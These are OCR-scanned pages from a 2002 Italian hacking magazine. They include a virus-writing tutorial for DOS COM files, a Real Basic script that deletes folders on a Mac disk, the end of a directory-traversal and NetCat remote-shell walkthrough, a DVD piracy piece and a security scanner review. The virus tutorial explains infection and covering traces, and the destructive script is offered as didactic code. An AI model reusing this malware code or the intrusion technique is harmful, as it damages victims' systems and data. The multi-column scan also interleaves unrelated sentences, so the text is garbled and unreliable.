http://www.sito.com/..\..\ dire alla vittima un bel NetCat, che lancere- in seguito tramite una
dir.exe mo poi in modalità shadow: collegandoci in semplice sessione telnet
seguito tramite una semplice sessione telnet avremo un accesso remoto alla
avremo un accesso remoto alla macchina, macchina, con la possibilità
verrebbe ignorata. E’ qui che interviene con la possibilità di utilizzarla proprio come di utilizzarla come se fosse
(in malo modo) l’implementazione di se fosse la nostra shell di MS-DOS. K la nostra shell di MS-DOS. K

www.hackerjournal.it | 25
Virus

QUANDO IL COMPUTER SI “AMMALA”

Introduzione al Virus
Sui Virus si è scritto molto. Pagine e pagine di letteratura informatica
non prive, a volte, di grossolane approssimazioni. Ma cosa sono i Virus?
Hacker Journal vi racconta tutto quello che avreste voluto sapere
su questo pericolso killer informatico, ma che non avete mai osato chiedere…

P
er la gente comune i due mag- gorie. Spesso e volentieri per virus si in- recenti virus per windows senza scor-
giori spauracchi informatici sono tendono anche altri programmi di tipo dare i virus delle MACRO di Office.
certamente gli hacker ed i virus. I malizioso che invece con questi hanno Questi sono alcuni fra i tipi di "infet-
"non addetti ai lavori" si ritrovano ben poco da spartire. tatori viruali" conosciuti e ci vorrebbero
spesso i peli della schiena drizzati Sostazialmente quando si crea un molte pagine per spiegare come essi
non appena sentono anche solo parassita virtuale si cerca di dare vita funzionano nel dettaglio. Per questa vol-
nominare uno di questi due termini. ad un programma di piccole dimensio- ta ci limiteremo a trattare quelli più
Tuttavia, nonostante la fama che i presunti ni che come scopo abbia quello di ce- semplici come gli appending e accen-
pirati-informatici e i parassiti dei file si sono larsi il più possibile nell'ospite e di ri- neremmo al polimorfismo e alla critto-
procurati nel mondo reale, ben pochi san- prodursi senza dare nell'occhio. Stando grafia.
no cosa essi realmente siano. In questa se- a questa distinzione, i semplici cavalli di
de non spenderò molte parole per gli hac- troia come i celeberrimi NetBus o BO
ker di cui se ne parla già molto e per i qua- o il più recente Sub7 non fanno par- >> Gli Appending Virus
li inizia a nascere una specie di "resistenza" te della categoria. Altra categoria a se
alla cattiva, ma errata, reputazione che si è sono i worm. Anche se questi si diffon- Gli appending virus sono i più co-
fatta la gente che seduta di fornte alla TV è dono per la rete spesso sfruttando bu- muni e più facili da realizzare. Essi si
costretta a sentire solo quello che gli viene chi dei sistemi di posta o l'ingenuità di copiano alla fine di un file e quando
detto. Al contrario degli hacker, i virus non chi ne è vittima, essi si diversificano dai questo viene eseguito ne prendono il
sono così difendibili, dato che la loro diffu- virus proprio per la loro attitudine alla controllo, si replicano in altri file e per
sione è esclusivamente dannosa per un rete e perchè raramente cercano di ce- ultimo ridanno il controllo al program-
computer. Eppure, è giusto che qualcuno larsi in un sistema infetto. ma infetto facendo sembrare il tutto
spenda due parole per cercare di spiegare Distinte due categorie diverse da normale. Questo tipo di parassiti deve
cosa sono questi temutissimi killer dei PC. quelle dei virus non ci resta che fare un essere molto piccolo per non aumen-
brevissimo riassunto delle diverse tipo- tare troppo le dimensioni di un file che
logie di virus esistenti: si parte dai più altrimenti sarebbe facilmente idividua-
>> Virus a D.O.C. semplici, i virus appending dei file bile come infetto. Gli appending si di-
COM, agli ormai impotenti virus del- vidono in due sottocategorie, quelli fat-
Prima di scendere nel dettaglio è uti- l'mbr, passando per gli sthealt parazia- ti per i file COM e quelli per i file
le fare una distinzione fra le varie cate- li e completi fino ai polimorfici e ai più EXE. Infatti, nonostante entrambi i file

26 | HACKER JOURNAL | 05.2002


con queste estensioni siano degli ese- Detto questo si è esaurito il grosso della aumentare basterà usare l'istruzione
guibili essi hanno molte differenze fra teoria sui virus appending, l'unico osta- CALL che chiama una procedura,
di loro e infettare i file COM risulta colo a questo punto può risultare la poppare in BP e poi sottrarre nel regi-
molto più semplice data la sua struttu- scarsa conoscenza dell'assembly quindi stro BP (che viene poco utilizzato) l'off-
ra, quindi questo testo si baserà per lo sarebbe bene sapere cosa è un registro set della procedura chiamata. Tutto ciò
più sull'infezione di file COM. La prima o un jump prima di proseguire. è possibile perchè quando chiamiamo
scelta da fare per la costruzione di un con una CALL l'offset della procedura
virus è quella del linguaggio nel quale >> La genesi dei virus… viene messo sopra lo stack, quindi con
scriverlo. Anche se il C può essere una POP lo mettiamo in BP. A questo
valida alternativa soprattutto per i virus punto i riferimenti alle varibili saranno
studiati per windows l'assembler rima- Una cosa che spesso molti dimenti- fatti chimando [BP+OFFSET variabile].
ne la soluzione migliore da adottare. cano è che se vengono usate delle va- Questa cosa risulta fondamentale per
Iniziamo quindi a vedere cosa deve riabili nel virus esse cambiano il loro evitare di perdere riferimenti alle varia-
fare un file per infettarne un altro senza valore di offset quando il virus si incol- bili, al contrario non serve modificare
rovinarlo: il virus messo in esecuzione la alla fine di un file. Ecco quindi che le istruzioni che usano un offset relati-
deve cercare un file *.com (per ora ci li- spesso risulta impossibile risalire a vo come le JMP o CALL o i vari salti
miteremo a questi), controllare in qual- queste variabili che diventano inutiliz- condizionati.
che modo di non averlo già infettato, Una volta trovata la variazione di
modificare il file come dopo vedremo e offset il programma occorre iniziare a
alla fine ripristinare la data dell'ultima cercare file da infettare. Siccome per
modifica e gli attributi del file come gli ora trattiamo solo di file *.COM la ri-
aveva trovati onde evitare di lasciare cerca sarà limitata a questo tipo di fi-
traccie. Fin qui le cose sono abbastanza le. Per cercare un file si ricorre alle chi-
semplici, il problema per chi inizia sta mate FIND FIRST e FIND NEXT cioè la
nel capire come fare in modo di toglie- 4Eh e la 4Fh del DOS (interrupt 21h).
re il controllo al file eseguito e darlo al Si inizia usando la 4Eh che cerca il pri-
virus che, come spiegato dopo, si deve mo file, questa funzione chiede che
attaccare alla fine del program- nel registro CX vengano posti gli attri-
ma. buti del file da cercare (0-Read Only
La soluzione è data dall'istruzione in 1-Hidden 2-System 3-Label 5-(riserva-
codice macchina JMP che scritta all'inizio to) 6-Archivio) mentre DS:DX il file da
del file fa saltare l'esecuzione alla fine, cercare con eventuali wildcards (* o ?).
dove risiede appunto il virus. In pratica Nel caso del virus si dovrà mettere nei
quest’ultimo, una volta eseguito, cerca i dati una variabile File_COM DB
file da infettare e appena ne trova uno "*.com", 0 che rappreseta la stringa in
adatto copia da una parte i primi byte ASCIIZ da cercare (il formato ASCIIZ
del file vittima e al loro posto scrive l'i- zabili. Per trovare sempre il valore di prevede uno 0 alla fine di ogni strin-
struzione JMP seguita dalla posizione offset effettivo delle varibile le si chia- ga) e poi mettere in CX il tipo di file da
che prenderà nel file. Fatto ciò copierà ma aggiungendo al loro vecchio valo- cercare con MOV CX,0000H per cer-
se stesso in coda al programma e conti- re di offset (quello che le viene asse- care, ad esempio, i file Read Only e
nuerà con le operazioni sopra citate, gnato dal compilatore) quello che le è poi mettere in DS:DX la stringa da cer-
cioè chiusura del file, ripristino degli at- stato aggiunto allegandole alla fine di care con LEA DX, [BP+OFFSET Fi-
tributi e esecuzione del file originale. un altro file. Per ottenere il valore da le_COM] quindi chimare INT 21h per

05.2002 | HACKER JOURNAL | 27


virus

QUANDO IL COMPUTER SI “AMMALA”

iniziare a cercare. La ricerca restituirà


solo il primo file trovato, se questo non
ci andrà bene basterà chiamare la FIND
DB 'R';maratore che nel nostro caso è
la lettera R
INIZIO: ;etichetta dove inizia il
SU MAC
NEXT (funzione 4Fh dell'INT 21h) con gli virus vero e proprio Programmare
stessi parameti (CX attributi, DS:DX file Il virus prima di iniziare ad infettare un virus non è
da cercare) per trovare il prossimo file controllera se il file al 4 byte non è stato un’operazione
finchè non trovimao una vittima adatta. marcato con un CMP, e nel caso non lo ristretta ai PC
Fin qui dovrebbe essere tutto semplice, sia procederà all’infezione. Ibm compatibili,
ma FIND FIRST e FIND NEXT dove ci re- infatti è
stituiscono il file? Beh, nel DTA che è una un’operazione semplice anche
parte del PSP posizionata ad 80h. >> Virus: un universo in ambiente Mac. Qui
Ora un virus non può usare il DTA ori-
ginale altrimenti i dati passati a linea di
complesso riportiamo per uso didattico
l’esempio di un virus
comando in seguito al programma ver- efficacissimo realizzato in
rebbero falsati, è quindi importante setta- Questo primo sguardo sul mondo Real Basic, uno dei software
re un nuova DTA e lavorare in quello. Ba- della programmazione virus-oriented ci di programmazione più
sterà preparare una variabie DTA di 42 mostra la complessità e la quantità di diffusi in ambiente Mac:
byte (DTA db 42 dup (?)) e poi usare la problemi a cui un virus-coder va incon-
funzione 1Ah del DOS: LEA DX,[BP+OFF- tro quando si mette in testa di sfornare Dim f as FolderItem
SET DTA] quindi MOV AH,1Ah e poi INT qualche parassita informatico. Dim g as FolderItem
21h. Ora il nome del file da provare ad Anche se, come abbiamo già detto, Dim h as FolderItem
infettare lo troveremo nella variabile DTA lo scrivere virus e soprattutto il diffon- Dim i as FolderItem
alla posizione 9eh (quindi chiameremo la derli in rete rappresentano azioni sem- Dim j as FolderItem
varibile DTA con [BP+OFFSET pre distruttive e dannose (ma non per le //dossier Programme
DTA+1Eh]). Nel DTA non si trova solo il grosse aziende che producono costosi f=GetFolderItem(“Macintosh
nome del file, ma anche i suoi attributi, la sistemi antivirus) è tuttavia innegabile il HD:Programme”)
data e l'ora dell'ultima modifica, le dimen- fascino tecnico di alcuni aspetti che si af- If f <> nil Then
sioni il tutto nel seguente ordine: frontano in questi ambiti dell’informati- f.Delete
ca: il consiglio migliore è quello di ap- End if
prendere sempre studiando anche que- //dossier Tools
FILE *.COM sto tipo di codici; spesso vi capiterà di ri- g=GetFolderItem(“Macintosh
i primi 256 byte (100h) sono manere di sasso nell’osservare con HD:Tools”)
il PSP nel PSP alla posizione quanta facilità un buon virus-coder ri- if g <> nil Then
80h c'è il DTA 80h DTA solve problemi di programmazione con g.Delete
0h db 21 dup(0) ;Riservato cui voi vi stavate battendo da giorni e End if
per usi del DOS giorni… K
15h db 00;Attributi del file h=GetFolderItem(“Macintosh
16h dw 0000;Ora di creazione (Nei prossimi articoli continueremo HD:Dienstprogramme”)
18h dw 0000;Data di creazione la trattazione dei virus entrando nello specifico If h <> nil Then
1ah dd 00000000;Dimensione di alcuni aspetti ed analizzando le diverse tipologie h.Delete
1eh db 13 dup(0);Nome del file di infezione). End if

quindi se volessimo, per leggere uno i=GetFolderItem(“Macintosh


qualsiasi di questi attributi basterà ag- HD:Dokumente”)
giungere all'indirizzo della varibile DTA If i <> nil Then
la posizione di ciò che ci interessa. i.Delete
Una volta trovato un file è indispensa- End if
bile asscurarsi che rientri nei nostri criteri
di infezione. Se il file è già stato infettato j=GetFolderItem(“Macintosh
sarebbe più opportuno evitare di rifarlo. HD:Internet”)
Uno dei metodi più comuni per controlla- If j <> nil Then
re se il file è già stato infettato è porre un j.Delete
marcatore d'infezione nei primi byte del End if
programma (e anche del virus), subito
dopo l'istruzione di jmp. Il virus dovrà, una Questo simpatico virus può
volta trovato una possibile vittima, control- bloccare un sistema operativo
lare se in una determinta posizione è pre- o danneggiare seriamente
sente una sigla particolare che iden- un disco rigido, conoscerne
tifichi il file come infetto. Nel virus co- lo script può servire
me prime istruzioni metteremo: a cavarsi d’impaccio
JMP INIZIO ;salto semplice in caso di emergenza.

28 | HACKER JOURNAL | 05.2002


pratica

DVD A PROVA DI COPIA

Come ti cracco il DVD


o lly wood si è accorta che o fit
po
ti calano, teva
H
p iù potente industria ci un sacc VD , i pr insensibile al problema?
la n o i D e
r t o che no, anche se i pi ematog di gente copia imaner
Ce rat r r
i ne afica mondiale avolo…
sanno u i
na più del d

problema della pirate- impercettibile dagli orecchi o dagli oc-


il ria sembra affliggere
un po' tutti i settori
chi umani. Tali contrassegni potranno
essere però riconosciuti dagli apparec-
della tecnologia di con- chi riproduttori e registratori. Così se
sumo. E' tutt'altro che sopita la polemica una copia sprovvista di filigrana elet-
della musica distribuita in formato MP3 e tronica verrà caricata su un masteriz-
dei CD audio che vengono facilmente du- zatore, l'operazione di copia non sarà
plicati o copiati sull'hard disk per poterne possibile e anche i lettori DVD non po-
immettere le canzoni in rete. Ma ora l'al- tranno leggere le copie pirata, ma so-
larme arriva dall'industria cinematografica >> Quando il gioco lo quelle con la filigrana elettronica
e riguarda un settore in forte crescita, si fa duro… apposta dalla casa di produzione. In
quello dei DVD video che ormai sono di- questo modo sarà praticamente im-
ventati un formato tra i più contraffatti. A possibile duplicare i DVD, ma anche
preoccupare le case di produzione cine-
matografiche è l'abbassamento di prezzo
dei masterizzatori per DVD che, di fatto,
A ltri sistemi per combattere la pira-
teria sono stati recentemente intro-
dotti, purtroppo per le major discogra-
leggere quelli eventualmente realizzati
in modo illegale, una doppia protezio-
ne che appare veramente a prova di
contribuisce ad allargare a dismisura il fiche sono stati ideati altrettanti sistemi bomba.
mercato dei falsi. L'equazione è semplice: di decriptaggio sempre più efficienti e Tutto questo a patto che l'alleanza
più masterizzatori, più copie illegali, ugua- facili da usare come il recente Smar- tra produttori di hardware e industria
le meno profitti per Hollywood e compa- tRipper, scaricabile molto facilmente del video digitale vada in porto, anche
gnia. da internet, e che consente di aggirare se è difficile dire se con essa la lotta al-
Intendiamoci, non è che le società cine- i sistemi anti-copia, tipo CSS, contenu- la pirateria sarà definitivamente vinta.
matografiche siano rimaste fino ad oggi ti nei DVD. Qualche dubbio rimane.
con le mani in mano. Infatti i DVD in com- Proprio per questo motivo le società
mercio dispongono di dispositivi anti-co- che operano nel settore del video han-
pia che tuttavia possono essere facilmente no deciso di cambiare l'orizzonte della
>> La sentenza
aggirati. Tra i più diffusi sistemi anti-copia propria lotta alla pirateria. Un vecchio
c'è il Content Scrambling System (CSS), detto dice: "se non puoi batterli fatteli Ha fatto scalpore la recente senten-
uno schema di criptatura e di autenticazio- amici", chiaramente la massima non è za della corte di appello di New York
ne dei dati ideato per evitare la copia dei applicabile al mondo dei pirati che dif- che ha, di fatto, condannato il proprie-
file video direttamente dal disco. Sfortuna- ficilmente sarebbero propensi a strin- tario di un sito (nb web 2000) vietan-
tamente per i produttori già nel 1999 un gere accordi con multinazionali di dogli di ospitare il link che permette di
hacker norvegese di sedici anni, Jon Jo- qualsivoglia settore. Tuttavia, un'al- scaricare il programma DeCSS, ovvero
hansen, ha ideato e messo in rete un pro- leanza può essere trovata proprio con il software per aggirare le protezioni
gramma chiamato DeCSS utilizzabile su i produttori di masterizzatori e lettori dei DVD e poterli copiare agevolmente
Pc equipaggiati con sistema opera- DVD che in qualche modo fanno invo- sul proprio PC per poi riprodurli. Se-
tivo Linux e in grado di permet- lontariamente parte della "catena" che condo la corte newyorchese l'uso di un
tere la copia su hard disk e porta alla realizzazione di copie pirata. codice come il DeCSS riporta implicita-
la riproduzione illimi- L'idea che è attualmente allo studio mente alla riproduzione illegale di co-
tata di copie di consiste nell'equipaggiare i DVD con pie di DVD protette dal diritto del copy-
DVD. Punto e una filigrana elettronica (Watermar- right. La sentenza di per sé non è così
a capo. king Review Panel) rilevabile dai lettori clamorosa, infatti non fa altro che ri-
e masterizzatori DVD di nuova genera- prendere una legge, piuttosto discussa,
zione, se costruiti con le dovute specifi- nota come Digital Millennium Copy-
che tecniche. La filigrana è la stessa right Act (DMCA) approvata nel 1998 e
che viene usata per i DVD-audio è che in qualche modo tutela il "codice
contrassegnerà permanentemente informatico", ovvero riconosce che an-
ogni singola sequenza video o audio che il software con annessi e connessi è
con del rumore che si presume sarà degno di tutela del copyright. K

www.hackerjournal.it | 29
Sicurezza

COME FARE UNA “SCANSIONE” DI SICUREZZA

Shadow
Security Scanner
Volete verificare la sicurezza del vostro server? Pensate che sia affetto da uno
o più bachi? Non vi resta che usare un software scanner e già che ci siete potete
optare per uno dei migliori in circolazione…

L a sicurezza informatica inizia a


interessare le aziende: la cre-
scente sensibilità verso questo
tipo di problematiche da parte
degli addetti ai lavori così come di chi
utilizza comunque il computer per pro-
Shadow Security Scanner è uno
scanner di rete in grado (come molti
altri prodotti a lui analoghi) di trovare
tutti i servizi attivi su un hostm, effettua-
re una serie di test su di essi e fornirci un
comodo report sul quale vengono elen-
do in ambiente Windows, per esempio,
il più famoso (e uno dei più costosi) è
senza dubbio Retina; di recente anche
Microsoft ha rilasciato un suo scanner
di sicurezza. Su Linux è la volta dei ce-
leberrimi SATAN, SAINT, e l’indiscusso
fessione sta evidentemente spingendo il cate tutte le possibili falle presenti sul si- Nessus.
mercato a trovare soluzioni che possa- stema nonché le soluzioni da imple- Shadows Security Scanner si presen-
no soddisfare il “bisogno di sicurezza” mentare e vari links a cui far riferimen- ta come un pacchetto installabile di soli
di molte aziende, nonché nuovi guada- to per ottenere informazioni dettagliate 3,4 Mega, downloadabile in versione
gni da un business che ad oggi appare su qualsiasi vulnerabilità nota. shereware al sito del suo programma-
molto florido. tore (Red Shadow) www.safety-
In quest’ottica è naturale che molti si lab.com: se nelle sue prime versioni
producano in progetti orientati alla sicu-
>> Shadow Security SSS era probabilmente niente più che
rezza, e la quantità di software che è Scanner un buon tool scritto da un appassiona-
oggi disponibile in rete ad uso di chi ha to di hacking&co (in effetti il program-
necessità di mettere una pezza ai propri Come già detto, esistono in com- ma appariva molto “black hat” anche
server è molto elevata. mercio moltissimi altri software che fan- nella grafica) il buon successo che ha
A volte, lo è anche la qualità. no più o meno la stessa cosa: rimanen- ottenuto ha spinto i suoi creatori a dar-

30 | www.hackerjournal.it
gli un tono decisamente più professio- sibile editare le politiche che vengono un responsabile di sicurezza e che tra-
nale e “business oriented”. utilizzate dal motore del programma mite SSS riescono quanto meno a “tap-
L’interfaccia è pulita ed efficace (sia- per effettuare le scansioni e applicarle pare” i buchi più clamorosi.
mo ormai alla versione 5.29), l’installa- in combinazione con una host-list. Con la frequenza con cui troviamo in
zione non presenta altre difficoltà che il Se per esempio nella nostra rete so- giro per la rete aziende che hostano
premere “next” ad ogni passo del wi- no presenti due server, uno Linux e uno 250 siti web commerciali e che non
zard, così anche l’uso è dei più sempl- NT, potremo dire a SSS che sul primo hanno mai fatto passare sui server un
ci: per un utilizzo di base non è richie- vengano effettuati controlli su servizi ti- service pack per NT 4.0, è senza dub-
sto altro che inserire l’host da scannare pici di macchine Linux, mentre sul se- bio positiva la diffusione e l’utilizzo di
e premere su “start”. condo solo quelli atti a scovare bachi di software del genere.
Fatto ciò, lo scanner comincia col NT. Il risparmio di tempo è notevole. E’ dunque sensato affidarsi a SSS per
pingare l’host, effettuare connessioni su Possiamo inoltre schedulare le scan- la sicurezza dei nostri server? Io credo
un ampio set di porte remote e iniziare sioni (per effettuarle magari di notte o in che a fronte del suo bassissimo costo
a collezionare informazioni. condizioni preordinate di scarso traffico (Retina offre di più, è vero, ma costa an-
Nella seconda fase del test vengono di rete) ed effettuare test specifici per che 100 volte tanto), e sempre tenendo
implementati tutti i vari tentativi di ex- quanto concerne denial of services e ben presente che mai si potranno otte-
ploiting, password cracking e compa- password cracking (sono presenti tools nere risultati paragonabili a quelli che
gnia che al termine della scansione ci solo un esperto in carne e ossa ci può
porteranno a ottenere un dettagliato garantire, sia quantomeno consigliabile
report (con tanto di grafici inutili, così provare la versione shereware e fare un
importanti per gli agenti commerciali di paio di scansioni sui server web nello
quelle aziende che vanno in giro a ven- stanzino: la quantità di “rosso” presente
dere “sicurezza” sotto forma di report sul monitor sarà il miglior indice di con-
generati in 5 minuti da software come sultazione.
questo…
>> I concorrenti
>> Di Baco in baco
E’ da tener presente che esistono mol-
Per ogni “audit” trovato (cioè ogni ti altri prodotti, alcuni dei quali gratuiti
possibile falla) avremo una descrizione come Nessus per Linux, che è nettamen-
del problema e un possibile test da ef- te superiore a SSS per moltissimi aspetti
fettuare al fine di verificare incontrover- (architettura server-client, versatilità
tibilmente se la nostra macchina è dav- etc…) ma che probabilmente si rivolgo-
vero affetta da tale baco: se per esem- appositi per queste operazioni). no a un altro tipo di utenza, data la loro
pio viene rilevato il famigerato “uni- Per quanto concerne l’update del da- relativa complessità.
code transversal bug” troveremo a tabase delle vulnerabilità, anche questo Strumenti come Shadow Security
report un url formato appositamente è una operazione resa semplicissima da Scanner di certo non sono la bacchetta
per mostrarci come sia possibile ese- un update automatico che scaricherà gli magica con cui rendere sicuro un web
guire comandi remotamente sul nostro aggiornamenti e li installerà in pochi server, ma rendono possibile anche a chi
server, o se per caso viene scovata una minuti. non è o non può permettersi un esperto
versione bucata di un qualche server Insomma, nelle sue ultime relase SSS di sicurezza informatica il poter uscire in
FTP troveremo un link al database di si è chiaramente orientato a quella fa- rete con rischi di security certamente infe-
securityfocus che ci porterà all’exploit in scia di utenza che necessita di un pro- riori rispetto a chi si limita a installare NT
questione. gramma semplice da utilizzare e che sia e a infilare lo spinotto nella scheda di re-
Oltre a questo, è presente anche almeno mediamente affidabile. te. L’altra faccia della medaglia è l’utiliz-
una descrizione delle procedure da im- E’ chiaro che nessun software potrà zo distruttivo che è possibile fare di que-
plementare per correggere la data vul- mai sostituire la consulenza di un esper- sti programmi: di fatto possiamo andare
nerabilità; in alcuni casi, come per to, e molto spesso nei report vengono a scannare qualsiasi host, ottenendo
esempio quando la soluzione a un ba- segnalati falsi positivi che ci costringono molte informazioni sul sistema operativo
co renda necessario la sola modifica- comunque a intervenire per verificare e sui servizi che vi sono installati; ed è
zione del registro di sistema, è addirit- che tutto sia a posto. probabilmente vero che molti kiddies si
tura possibile correggere l’errore sem- E’ altresì vero, però, che questo pro- trovano per le mani uno strumento piut-
plicemente cliccando su un bottone gramma, per come è pensato e per tosto potente che addirittura fornisce loro
“Fix-it”, anche se veniamo comunque quello che offre, funziona bene: molto url malformati ad arte per poter esegui-
avvertiti che non sempre questa proce- seguito dai suoi programmatori, e quin- re comandi remoti su un server con un
dura è efficace. di molto spesso aggiornato e migliora- semplice click. Ma il discorso è sempre lo
Addentrandoci un filo più profonda- to in alcuni aspetti, è ad oggi una solu- stesso: non si tratta mai di valutare se
mente tra le varie opzioni che SSS ci of- zione economica (la licenza costa uno strumento è di per se buono o catti-
fre, però, iniziamo a trovare varie cose 100 dollari o giù di lì) per piccole vo. Buono o cattivo sarà sempre e solo
che lo rendono più interessante: è pos- aziende che non possono permettersi l’utilizzo che se ne fa. K

www.hackerjournal.it | 31
www.hackerjournal.it